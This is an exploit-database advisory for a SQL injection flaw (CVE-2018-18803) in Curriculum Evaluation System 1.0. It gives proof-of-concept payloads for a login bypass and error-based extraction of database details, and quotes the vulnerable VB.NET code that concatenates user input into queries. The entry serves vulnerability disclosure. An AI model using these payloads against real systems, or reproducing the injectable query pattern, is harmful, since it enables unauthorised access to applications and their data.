Curriculum Evaluation System 1.0 - SQL Injection

vendor:

Curriculum Evaluation System

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Curriculum Evaluation System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: CVE-2018-18803

CPE: a:sourcecodester:curriculum_evaluation_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows, Linux, Mac

2018

Curriculum Evaluation System 1.0 – SQL Injection

The Curriculum Evaluation System 1.0 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries into the 'txtSearch' parameter of the 'frmCourse.vb' file and the 'username' and 'pass' parameters of the 'user.vb' file. This can allow an attacker to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803

# POC: 
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe

# POC: 
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
# 
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png

#[PATH]/frmCourse.vb
#....
#47     Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48         sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49         reloadDtg(sql, dtglist)
#50     End Sub
#....

#[PATH]/includes/user.vb
#....
#05     Public Sub login(ByVal username As Object, ByVal pass As Object)
#06         Try
#07 
#08             con.Open()
#09             reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10 
#11 
#12             If dt.Rows.Count > 0 Then
#13                 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16                     With Form1
#17                         .tsAddG.Enabled = True
#18                         .tsStudent.Enabled = True
#19                         .tsCurriculum.Enabled = True
#20                         .tsGrades.Enabled = True
#21                         .tsReport.Enabled = True
#22                         .tsUtilities.Enabled = True
#23                         .tsSearchStudent.Enabled = True
#24                         .tsLogin.Image = My.Resources.logout
#25                         .tsLogin.Text = "Logout"
#26                     End With
#27 
#28 
#29                     LoginForm1.Close()
#30 
#31 
#32                 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33 
#34                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35                     'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36                     With Form1
#37                         .tsAddG.Enabled = True
#38                         .tsStudent.Enabled = True
#39                         .tsCurriculum.Enabled = True
#40                         .tsGrades.Enabled = True
#41                         .tsReport.Enabled = True
#42                         .tsSearchStudent.Enabled = True
#43                         .tsLogin.Image = My.Resources.logout
#44                         .tsLogin.Text = "Logout"
#45                     End With
#46 
#47 
#48 
#49 
#50                     LoginForm1.Close()
#51 
#52 
#53 
#54                 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55                     MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56                     'With Form1
#57                     With Form1
#58                         .tsAddG.Enabled = True
#59                         .tsStudent.Enabled = True
#60                         .tsCurriculum.Enabled = True
#61                         .tsGrades.Enabled = True
#62                         .tsReport.Enabled = True
#63 
#64                         .tsSearchStudent.Enabled = True
#65                         .tsLogin.Image = My.Resources.logout
#66                         .tsLogin.Text = "Logout"
#67                     End With
#68 
#69 
#70                     LoginForm1.Close()
#71                 End If
#72 
#73                 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74                 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75                 'Form1.StatusStrip1.Visible = True
#76                 'inserting logs
#77                 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78                 '   " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79                 'create(sql)
#80 
#81             Else
#82                 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83             End If
#84         Catch ex As Exception
#85             MsgBox(ex.Message)
#86         End Try
#87         con.Close()
#88         da.Dispose()
#89     End Sub
#....